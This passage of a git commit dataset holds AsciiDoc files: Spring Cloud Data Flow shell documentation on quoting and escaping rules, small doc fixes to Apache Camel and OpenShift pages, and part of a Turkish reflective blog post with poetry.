if specified: 'true'\n Default if unspecified: 'false'\n----\n\n[[shell-tab-completion]]\n== Tab Completion\n\nThe shell command options can be completed in the shell by pressing the `TAB` key after the leading `--`. For example, pressing `TAB` after `stream create --` results in\n```\ndataflow:>stream create --\nstream create --definition stream create --name\n```\n\nIf you type `--de` and then hit tab, `--definition` will be expanded.\n\nTab completion is also available inside the stream or composed task DSL expression for application or task properties. You can also use `TAB` to get hints in a stream DSL expression for what available sources, processors, or sinks can be used.\n\n[[shell-white-space]]\n== White Space and Quoting Rules\n\nIt is only necessary to quote parameter values if they contain spaces or the `|` character. The following example passes a SpEL expression (which is applied to any data it encounters) to a transform processor:\n\n`transform --expression='new StringBuilder(payload).reverse()'`\n\nIf the parameter value needs to embed a single quote, use two single quotes, as follows:\n\n[source]\n\/\/ Query is: Select * from \/Customers where name='Smith'\nscan --query='Select * from \/Customers where name=''Smith'''\n\n\n[[dsl-quotes-escaping]]\n=== Quotes and Escaping\n\nThere is a Spring Shell-based client that talks to the Data Flow Server and is responsible for *parsing* the DSL.\nIn turn, applications may have applications properties that rely on embedded languages, such as the *Spring Expression Language*.\n\nThe shell, Data Flow DSL parser, and SpEL have rules about how they handle quotes and how syntax escaping works.\nWhen combined together, confusion may arise.\nThis section explains the rules that apply and provides examples of the most complicated situations you may encounter when all three components are involved.\n\n[NOTE]\n.It's not always that complicated\n====\nIf you do not use the Data Flow shell (for example, you use the REST API directly) or if application properties are not SpEL expressions, then the escaping rules are simpler.\n====\n\n==== Shell rules\nArguably, the most complex component when it comes to quotes is the shell. The rules can be laid out quite simply, though:\n\n* A shell command is made of keys (`--something`) and corresponding values. There is a special, keyless mapping, though, which is described later.\n* A value cannot normally contain spaces, as space is the default delimiter for commands.\n* Spaces can be added though, by surrounding the value with quotes (either single (`'`) or double (`\"`) quotes).\n* If surrounded with quotes, a value can embed a literal quote of the same kind by prefixing it with a backslash (`\\`).\n* Other escapes are available, such as `\\t`, `\\n`, `\\r`, `\\f` and unicode escapes of the form `\\uxxxx`.\n* The keyless mapping is handled in a special way such that it does not need quoting to contain spaces.\n\nFor example, the shell supports the `!` command to execute native shell commands. The `!` accepts a single keyless argument. This is why the following works:\n----\ndataflow:>! rm something\n----\nThe argument here is the whole `rm something` string, which is passed as is to the underlying shell.\n\nAs another example, the following commands are strictly equivalent, and the argument value is `something` (without the quotes):\n----\ndataflow:>stream destroy something\ndataflow:>stream destroy --name something\ndataflow:>stream destroy \"something\"\ndataflow:>stream destroy --name \"something\"\n----\n\n\n==== DSL Parsing Rules\nAt the parser level (that is, inside the body of a stream or task definition) the rules are as follows:\n\n* Option values are normally parsed until the first space character.\n* They can be made of literal strings, though, surrounded by single or double quotes.\n* To embed such a quote, use two consecutive quotes of the desired kind.\n\nAs such, the values of the `--expression` option to the filter application are semantically equivalent in the following examples:\n----\nfilter --expression=payload>5\nfilter --expression=\"payload>5\"\nfilter --expression='payload>5'\nfilter --expression='payload > 5'\n----\n\nArguably, the last one is more readable. It is made possible thanks to the surrounding quotes. The actual expression is `payload > 5` (without quotes).\n\nNow, imagine that we want to test against string messages. If we want to compare the payload to the SpEL literal string, `\"something\"`, we could use the following:\n----\nfilter --expression=payload=='something' <1>\nfilter --expression='payload == ''something''' <2>\nfilter --expression='payload == \"something\"' <3>\n----\n<1> This works because there are no spaces. It is not very legible, though.\n<2> This uses single quotes to protect the whole argument. Hence, the actual single quotes need to be doubled.\n<3> SpEL recognizes String literals with either single or double quotes, so this last method is arguably the most readable.\n\nPlease note that the preceding examples are to be considered outside of the shell (for example, when calling the REST API directly).\nWhen entered inside the shell, chances are that the whole stream definition is itself inside double quotes, which would need to be escaped. The whole example then becomes the following:\n----\ndataflow:>stream create something --definition \"http | filter --expression=payload='something' | log\"\n\ndataflow:>stream create something --definition \"http | filter --expression='payload == ''something''' | log\"\n\ndataflow:>stream create something --definition \"http | filter --expression='payload == \\\"something\\\"' | log\"\n----\n\n\n\n==== SpEL Syntax and SpEL Literals\nThe last piece of the puzzle is about SpEL expressions.\nMany applications accept options that are to be interpreted as SpEL expressions, and, as seen above, String literals are handled in a special way there, too. The rules are as follows:\n\n* Literals can be enclosed in either single or double quotes.\n* Quotes need to be doubled to embed a literal quote. Single quotes inside double quotes need no special treatment, and the reverse is also true.\n\nAs a last example, assume you want to use the link:${scs-app-starters-docs}\/spring-cloud-stream-modules-processors.html#spring-clound-stream-modules-transform-processor[transform processor].\nThis processor accepts an `expression` option which is a SpEL expression. It is to be evaluated against the incoming message, with a default of `payload` (which forwards the message payload untouched).\n\nIt is important to understand that the following statements are equivalent:\n----\ntransform --expression=payload\ntransform --expression='payload'\n----\n\nHowever, they are different from the following (and variations upon them):\n----\ntransform --expression=\"'payload'\"\ntransform --expression='''payload'''\n----\n\nThe first series evaluates to the message payload, while the latter examples evaluate to the literal string, `payload`, (again, without quotes).\n\n==== Putting It All Together\nAs a last, complete example, consider how one could force the transformation of all messages to the string literal, `hello world`, by creating a stream in the context of the Data Flow shell:\n\/\/ asciidoctor note: callouts don't work here, they mess up the TOC for some reason\n----\ndataflow:>stream create something --definition \"http | transform --expression='''hello world''' | log\" <1>\n\ndataflow:>stream create something --definition \"http | transform --expression='\\\"hello world\\\"' | log\" <2>\n\ndataflow:>stream create something --definition \"http | transform --expression=\\\"'hello world'\\\" | log\" <2>\n----\n<1> In the first line, there are single quotes around the string (at the Data Flow parser level), but they need to be doubled because they are inside a string literal (started by the first single quote after the equals sign).\n<2> The second and third lines, use single and double quotes respectively to encompass the whole string at the Data Flow parser level. Consequently, the other kind of quote can be used inside the string. The whole thing is inside the `--definition` argument to the shell, though, which uses double quotes. Consequently, double quotes are escaped (at the shell level)\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ea150458d8445ec1d11c78dd4a9ab97855096ce","subject":"Update why-does-maven-not-download-dependencies.adoc","message":"Update why-does-maven-not-download-dependencies.adoc\n\nFix typo","repos":"adessaigne\/camel,apache\/camel,mcollovati\/camel,pmoerenhout\/camel,mcollovati\/camel,tdiesler\/camel,pmoerenhout\/camel,cunningt\/camel,gnodet\/camel,cunningt\/camel,pax95\/camel,pax95\/camel,christophd\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tadayosi\/camel,alvinkwekel\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,cunningt\/camel,tadayosi\/camel,nicolaferraro\/camel,pax95\/camel,apache\/camel,cunningt\/camel,nikhilvibhav\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,mcollovati\/camel,alvinkwekel\/camel,nicolaferraro\/camel,tdiesler\/camel,nikhilvibhav\/camel,adessaigne\/camel,gnodet\/camel,nicolaferraro\/camel,apache\/camel,gnodet\/camel,apache\/camel,tdiesler\/camel,adessaigne\/camel,gnodet\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,mcollovati\/camel,apache\/camel,tadayosi\/camel,pmoerenhout\/camel,alvinkwekel\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,christophd\/camel,adessaigne\/camel,cunningt\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,nicolaferraro\/camel,tadayosi\/camel,alvinkwekel\/camel,christophd\/camel,pax95\/camel,gnodet\/camel","old_file":"docs\/user-manual\/modules\/faq\/pages\/why-does-maven-not-download-dependencies.adoc","new_file":"docs\/user-manual\/modules\/faq\/pages\/why-does-maven-not-download-dependencies.adoc","new_contents":"[[Whydoesmavennotdownloaddependencies-Whydoesmavennotdownloaddependencies]]\n= Why does Maven not download dependencies?\n\nMaven uses HTTP to download its dependencies along with the dependencies\nof the Maven project (such as Camel).\n\nIf you run Maven and it fails to download your required dependencies it's\nlikely to be caused by your local firewall & HTTP proxy configurations.\n\nSee the http:\/\/maven.apache.org\/guides\/mini\/guide-proxies.html[Maven documentation for details of how to configure the HTTP proxy].\n","old_contents":"[[Whydoesmavennotdownloaddependencies-Whydoesmavennotdownloaddependencies]]\n= Why does Maven not download dependencies?\n\nMaven uses HTTP to download its dependenices along with the dependencies\nof the Maven project (such as Camel).\n\nIf you run Maven and it fails to download your required dependencies it's\nlikely to be caused by your local firewall & HTTP proxy configurations.\n\nSee the http:\/\/maven.apache.org\/guides\/mini\/guide-proxies.html[Maven documentation for details of how to configure the HTTP proxy].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c48e57b86d101a1c8780062df4f289bcecdf4cd","subject":"WMCO - Fixed an incorrect link in the WMCO documentation.","message":"WMCO - Fixed an incorrect link in the WMCO documentation.\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"windows_containers\/enabling-windows-container-workloads.adoc","new_file":"windows_containers\/enabling-windows-container-workloads.adoc","new_contents":"[id=\"enabling-windows-container-workloads\"]\n= Enabling Windows container workloads\ninclude::modules\/common-attributes.adoc[]\n:context: enabling-windows-container-workloads\n\ntoc::[]\n\nBefore adding Windows workloads to your cluster, you must install the Windows Machine Config Operator (WMCO), which is available in the {product-title} OperatorHub. The WMCO orchestrates the process of deploying and managing Windows workloads on a cluster.\n\n[discrete]\n== Prerequisites\n\n* You have access to an {product-title} cluster using an account with `cluster-admin` permissions.\n\n* You have installed the OpenShift CLI (`oc`).\n\n* You have installed your cluster using installer-provisioned infrastructure. Clusters installed with user-provisioned infrastructure are not supported for Windows container workloads.\n\n* You have configured hybrid networking with OVN-Kubernetes for your cluster. This must be completed during the installation of your cluster. For more information, see xref:..\/networking\/ovn_kubernetes_network_provider\/configuring-hybrid-networking.adoc#configuring-hybrid-ovnkubernetes[Configuring hybrid networking].\n\n* You are running an {product-title} cluster version 4.6.8 or later.\n\n.Additional resources\n* For the comprehensive prerequisites for the Windows Machine Config Operator, see xref:..\/windows_containers\/understanding-windows-container-workloads.adoc#wmco-prerequisites_understanding-windows-container-workloads[Understanding Windows container workloads].\n\n[id=\"installing-the-wmco\"]\n== Installing the Windows Machine Config Operator\n\nYou can install the Windows Machine Config Operator using either the web console or OpenShift CLI (`oc`).\n\ninclude::modules\/installing-wmco-using-web-console.adoc[leveloffset=+2]\n\ninclude::modules\/installing-wmco-using-cli.adoc[leveloffset=+2]\n\ninclude::modules\/configuring-secret-for-wmco.adoc[leveloffset=+1]\n\n\n== Additional resources\n\n* xref:..\/installing\/installing_azure\/installing-azure-default.adoc#ssh-agent-using_installing-azure-default[Generating a key pair for cluster node SSH access]\n* xref:..\/operators\/admin\/olm-adding-operators-to-cluster.adoc#olm-adding-operators-to-a-cluster[Adding Operators to a cluster].\n","old_contents":"[id=\"enabling-windows-container-workloads\"]\n= Enabling Windows container workloads\ninclude::modules\/common-attributes.adoc[]\n:context: enabling-windows-container-workloads\n\ntoc::[]\n\nBefore adding Windows workloads to your cluster, you must install the Windows Machine Config Operator (WMCO), which is available in the {product-title} OperatorHub. The WMCO orchestrates the process of deploying and managing Windows workloads on a cluster.\n\n[discrete]\n== Prerequisites\n\n* You have access to an {product-title} cluster using an account with `cluster-admin` permissions.\n\n* You have installed the OpenShift CLI (`oc`).\n\n* You have installed your cluster using installer-provisioned infrastructure. Clusters installed with user-provisioned infrastructure are not supported for Windows container workloads.\n\n* You have configured hybrid networking with OVN-Kubernetes for your cluster. This must be completed during the installation of your cluster. For more information, see xref:..\/networking\/ovn_kubernetes_network_provider\/configuring-hybrid-networking.adoc#configuring-hybrid-ovnkubernetes[Configuring hybrid networking].\n\n* You are running an {product-title} cluster version 4.6.8 or later.\n\n.Additional resources\n* For the comprehensive prerequisites for the Windows Machine Config Operator, see xref:understanding-windows-container-workloads.adoc#wmco-prerequisites_understanding-windows-container-workloads[Understanding Windows container workloads].\n\n[id=\"installing-the-wmco\"]\n== Installing the Windows Machine Config Operator\n\nYou can install the Windows Machine Config Operator using either the web console or OpenShift CLI (`oc`).\n\ninclude::modules\/installing-wmco-using-web-console.adoc[leveloffset=+2]\n\ninclude::modules\/installing-wmco-using-cli.adoc[leveloffset=+2]\n\ninclude::modules\/configuring-secret-for-wmco.adoc[leveloffset=+1]\n\n\n== Additional resources\n\n* xref:..\/installing\/installing_azure\/installing-azure-default.adoc#ssh-agent-using_installing-azure-default[Generating a key pair for cluster node SSH access]\n* xref:..\/operators\/admin\/olm-adding-operators-to-cluster.adoc#olm-adding-operators-to-a-cluster[Adding Operators to a cluster].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eac755e76d201d4d2e207e4b8f79327358d843db","subject":"Update 2017-10-02-Kisa-Kisa-2.adoc","message":"Update 2017-10-02-Kisa-Kisa-2.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_file":"_posts\/2017-10-02-Kisa-Kisa-2.adoc","new_contents":"= K\u0131sa K\u0131sa (2)\n:hp-tags:\n\nBir s\u00fcredir haftada bir yapt\u0131\u011f\u0131m yolculuklarda fark\u0131na vard\u0131m ki her yolculuk bana \u00f6l\u00fcm\u00fc ciddi anlamda hat\u0131rlat\u0131yor. G\u00fcnl\u00fck ya\u015fant\u0131da mezarl\u0131k duvarlar\u0131n\u0131n arkas\u0131na silkeledi\u011fim(iz) bu ger\u00e7e\u011fi hat\u0131rlamama vesile oluyor yolculuklar. Her yolculuk bunu az veya \u00e7ok bir \u015fekilde y\u00e2d\u0131ma d\u00fc\u015f\u00fcr\u00fcyormu\u015f asl\u0131nda yeni farkettim. Neden sorusu bu sezi\u015fin pe\u015fine tak\u0131ld\u0131 hemencecik. \u0130lk akl\u0131ma gelen cevap \u015fu oldu: \"\u00d6l\u00fcm de bir yolculuktur neticede. Bu k\u0131sa yolculuklar o b\u00fcy\u00fck yolculu\u011fun bir musaggaras\u0131d\u0131r.\" Bir de \u015f\u00f6yle tartt\u0131m kendimi: \"Yoksa geri d\u00f6nememek korkusu mu bu ya\u015fad\u0131\u011f\u0131n?\", \"\u00d6l\u00fcm\u00fc de geri d\u00f6n\u00fc\u015f\u00fc olmayan bir gidi\u015f olarak g\u00f6r\u00fcyorsun da D\u00fcnya'ya d\u00fc\u015fk\u00fcnl\u00fc\u011f\u00fcn m\u00fc akl\u0131na getiriyor onu?\" Terazinin iki kefesine iki d\u00fc\u015f\u00fcnceyi de b\u0131rakt\u0131m, tahterevallide oynayan \u00e7ocuklar gibi hangileri a\u015fa\u011f\u0131da hangileri yukar\u0131da g\u00f6remedim.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBu yolculuklar\u0131n bitiminde kendimi bir arkada\u015f\u0131n kuca\u011f\u0131na b\u0131rak\u0131verdim. Birka\u00e7 ayd\u0131r uzak kald\u0131\u011f\u0131m, avlusunda kedilerin ko\u015fturmacas\u0131na dald\u0131\u011f\u0131m \u00dcsk\u00fcdar Mihrimah Sultan Cami\u00ee'nden ba\u015fka bir yer de\u011fildi. Her seferinde uzaktan g\u00fcl-endam\u0131n\u0131 seyredip biraz \u00f6zlem biraz sevin\u00e7le yol al\u0131yorum ona do\u011fru. Gece en siyah \u00e7ar\u015faf\u0131 \u00f6rterken g\u00f6ky\u00fcz\u00fcne avlusuna ayak bas\u0131yorum, Valide Sultan Cami\u00ee ile s\u00f6yle\u015fmeye ba\u015fl\u0131yor iki dost. B\u00f6lm\u00fcyorum onlar\u0131, dinliyorum bir yandan \u015fad\u0131rvandan akan sular\u0131n sesi. G\u00fcne\u015f utanga\u00e7l\u0131\u011f\u0131n\u0131 k\u0131z\u0131ll\u0131klar\u0131n ard\u0131nda b\u0131rakarak g\u00f6steriyor kendini. Bir ba\u015fka dostu g\u00f6r\u00fcyorum, uzak kalman\u0131n \u0131rak edemedi\u011fi bir dostu. Sonra diyorum: \"Dostu g\u00f6rmek, bayramd\u0131r.\"\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYolculuk, okul, i\u015f derken bir yo\u011funluk kapl\u0131yor d\u00f6rt yan\u0131m\u0131. Yapaca\u011f\u0131m i\u015flerin, g\u00f6revlerin vs. zihnimi me\u015fgul etmesi san\u0131r\u0131m daha yorucu oluyor. Bu yo\u011funluk i\u00e7erisinde bir yaz\u0131y\u0131 okumak i\u00e7in zaman kollamaya \u00e7al\u0131\u015f\u0131yordum, bir t\u00fcrl\u00fc nasip olmuyordu. Okudu\u011fum zaman normalde alamayaca\u011f\u0131m bir keyfi ald\u0131m. San\u0131r\u0131m okumak i\u00e7in g\u00f6sterdi\u011fim i\u015ftiyak kitapla\/yaz\u0131yla aramda bir ba\u011f olu\u015fmas\u0131na vesile oluyor. Ayn\u0131 durum ruhen, zihnen yo\u011fun oldu\u011fum veya kendimi yaln\u0131z hissetti\u011fim -y\u0131llard\u0131r tek ya\u015famama ra\u011fmen yaln\u0131z hissetti\u011fim zamanlar, kalabal\u0131klar i\u00e7indeki yaln\u0131zl\u0131\u011f\u0131mdan az- anlarda yine ortaya \u00e7\u0131k\u0131yor. Roman\u0131n bir kahraman\u0131 omzuma dokunuyor, bir di\u011feri elini uzat\u0131yor, \u00f6b\u00fcr\u00fc g\u00fcl\u00fcms\u00fcyor. Buna en iyi \u00f6rnek _Nisan'\u0131n 2 G\u00fcn\u00fc_, basit ve yal\u0131n bir anlat\u0131m\u0131 olsa da i\u00e7inde yer buldu\u011fum bir romand\u0131. Birka\u00e7 y\u0131l \u00f6nce okul k\u00fct\u00fcphanesinde denk gelip \u00f6d\u00fcn\u00e7 alm\u0131\u015ft\u0131m. Bir k\u0131\u015f g\u00fcn\u00fc s\u0131rt\u0131m\u0131 pete\u011fe dayay\u0131p okudu\u011fumu hat\u0131rl\u0131yorum. Petek siperin bir cephesi olmu\u015ftu, ayaklar\u0131m\u0131n siperin di\u011fer cephesine de\u011fdi\u011fini hissediyordum. Kabzas\u0131 ayaklar\u0131m\u0131n ucunda bir t\u00fcfek omzuma yaslanm\u0131\u015ft\u0131.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u0130yi insan tan\u0131yorum, ke\u015fke daha \u00f6nce tan\u0131sayd\u0131m diyorum. Ve ke\u015fkeye \u00f6yle bir duygu ve vurgu y\u00fckl\u00fcyorum ki takat getiremiyor, eziliyor. Bir mahr\u00fb -g\u00fczel tavr\u0131 ay gibi parl\u0131yor- bed\u00e2yi-\u00e2\u015fin\u00e2 (bed\u00e2yi-\u015finas) nas\u0131l olunur \u00f6\u011fretiyor. Ben ne kadar \u00f6\u011frenebilirim bilmiyorum. Bir daha *ke\u015fke*... \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nCevdet Pa\u015fa'n\u0131n eli omzuma dokundu.\n\n_Nas\u0131l \u00e7\u0131ld\u0131rmad\u0131m hayretdeyim h\u00e2l\u00e2 sevincimden_ +\n_Lis\u00e2n\u0131ndan seni sevdim s\u00f6z\u00fcn g\u00fb\u015f itdi\u011fim demler_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nG\u00f6kte ay, parl\u0131yor; ay\u0131n on d\u00f6rd\u00fcd\u00fcr. \n\n_Sana vard\u0131r y\u00fcre\u011fimde s\u00f6zlerim_\n\nvideo::So6VlDiHukI[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nDede Efendi ne dersin b\u00f6yle?\n\nvideo::vvFUnXpoUSE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n_\"Anlat\u0131yorum, hi\u00e7 konu\u015fmadan,_ +\n_Bu\u011fday\u0131n i\u00e7ini d\u00f6kmesi gibi...\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nBir dua, Kays'\u0131n dilinden g\u00f6nl\u00fcme d\u00fc\u015fer: +\n_\"Gittik\u00e7e h\u00fcsn\u00fcn eyle ziy\u00e2de nig\u00e2r\u0131m\u0131n_ +\n_Geldik\u00e7e derdine beter et m\u00fcptel\u00e2 beni\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n-_Neden kendi c\u00fcmlelerinle konu\u015fmazs\u0131n?_ +\n-Bu h\u00e2l, akl\u0131m\u0131 setr ederken ben nas\u0131l konu\u015fay\u0131m? +\n-_Peki niye kendine s\u00f6zc\u00fcler bulursun, onlar\u0131n diliyle s\u00f6ylersin?_ +\n-Dilim kendi g\u00f6nl\u00fcmden konu\u015fsa bu ate\u015f ya\u015f yaprak m\u0131 b\u0131rak\u0131r? +\n-_Peki niye susmazs\u0131n?_ +\n-\u0130\u00e7im ile durmadan s\u00f6yle\u015firken nas\u0131l susay\u0131m? +\n-_Haberdar oldu\u011funa delilin var m\u0131d\u0131r?_ +\n-Bir ay, ayd\u0131nl\u0131\u011f\u0131n\u0131n d\u00fc\u015ft\u00fc\u011f\u00fc g\u00f6n\u00fclden big\u00e2ne midir? +\n-_Ne vakte kadar inilersin?_ +\n-Vaktin varl\u0131\u011f\u0131ndan s\u0131yr\u0131lmadan tamam olunur mu? +\n-_Neyi beklersin?_ +\n-Pervane, \u015fem tutu\u015fmadan ne yaps\u0131n? Bekledi\u011fim \u015feminden bir \u0131\u015f\u0131kt\u0131r.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nvideo::asqjpUOo3YE[youtube]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nUyutmayan sebep, sen ne g\u00fczelsin! \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nYa Karacao\u011flan halim ortadad\u0131r, h\u00e2l\u00e2 uyand\u0131rmaz m\u0131? +\n_\"Perv\u00e2ne \u015fem\u2019ini uyand\u0131ramaz_ +\n_Ba\u015fta sevd\u00e2 kalpte n\u00e2r olmay\u0131nca\"_\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcmit ve sab\u0131r, iki karde\u015f. Birbirlerine ne g\u00fczel sar\u0131l\u0131yor \u015fimdi. \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00d6yle sermestim ki ne i\u015f ne yolculuk ne okul ne de s\u0131navdan bir yorgunluk hissediyorum. Nas\u0131l sermest olmayay\u0131m ki muhatap alm\u0131\u015fken bu bendeyi? \n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u00dcfleyiverdi y\u00e2reme \u015fifa deyu ol mehlik\u00e2 +\nAmma c\u00fb\u015fa getirdi i\u00e7re ate\u015fi bilmedi\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nAcemice, belki hadsizce. Dilime dolanmadan kelimeler s\u00f6ylemek kolay de\u011fil. +\nG\u00fcn do\u011fmas\u0131n pencereme ne olur, gecemi ayd\u0131nlatan ay yeter. +\n_Bir nefeslik lafz\u0131mda zikrime c\u00e2nan d\u00fc\u015fer_\n\nvideo::244526490[vimeo]\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervaneyi bir vesvese tutmu\u015f, ka\u00e7 gecedir uyumaz beni de uyutmaz. \"S\u00f6ylediklerimle \u015femi \u00fczer miyim?\", diye kara kara d\u00fc\u015f\u00fcn\u00fcr. \"Acaba \u015fem pervanenin varl\u0131\u011f\u0131ndan ho\u015fnut mudur?\" Teselli verdim, ikna etmeye kalk\u0131\u015ft\u0131m. K\u00e2r etmedi. Ne diyeyim, nas\u0131l edeyim? +\n*Pervane kendi acizli\u011fine hatalar\u0131na bak\u0131p vesveseye d\u00fc\u015ferdi. \u015eem \u00fcz\u00fclmesin; pervane tevekk\u00fcl ipine sar\u0131ld\u0131, \u00f6ylece uyudu.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\nPervanenin benden ba\u015fka s\u0131rda\u015f\u0131 yok, kime anlats\u0131n halini? Kime d\u00f6ks\u00fcn i\u00e7ini? Ak\u0131tacak g\u00f6z\u00fcnden ya\u015flar\u0131 ama onlar\u0131n s\u0131rr\u0131n\u0131 if\u015fa edece\u011finden \u00e7ekinir. G\u00f6zya\u015flar\u0131n\u0131 da i\u00e7inde saklar.\n\n\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\u273f\n\n\u015eem'i \u00fczerlermi\u015f, yorgun b\u0131rak\u0131rlarm\u0131\u015f galiba. Be 